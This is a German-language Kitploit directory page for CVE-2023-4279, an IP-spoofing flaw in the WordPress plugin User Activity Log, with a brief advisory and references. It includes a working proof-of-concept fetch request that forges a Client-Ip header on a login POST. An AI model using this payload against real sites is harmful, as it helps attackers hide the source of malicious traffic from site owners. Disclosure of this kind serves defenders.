Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-4279 — Repository for CVE-2023-4279 vulnerability. | Kitploit
Tools/GitHubGitHub/b0marek/cve-2023-4279
Vulnerability AnalysisExploitationIDS/IPS EvasionImpersonation ToolsInformation GatheringWeb Security
GitHubb0marek/cve-2023-4279

CVE-2023-4279

Repository for CVE-2023-4279 vulnerability.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-ID: CVE-2023-4279

Schwachstellentyp: IP-Adressen-Spoofing

Beschreibung: Dieses Plugin bezieht Client-IP-Adressen aus potenziell unsicheren Headern, was einem Angreifer ermöglicht, deren Wert zu manipulieren. Dies kann genutzt werden, um die Quelle bösartigen Datenverkehrs zu verbergen.

Schritte zum Reproduzieren:

root@kitploit:~
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.

2. Führen Sie den folgenden Code im Webbrowser aus und beachten Sie im Backend, dass die IP-Adresse gefälscht wurde.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
}); 

Referenzen:

  1. https://wpscan.com/vulnerability/2bd2579e-b383-4d12-b207-6fc32cfb82bc
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4279
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-activity-log/user-activity-log-166-ip-address-spoofing
Tool herunterladen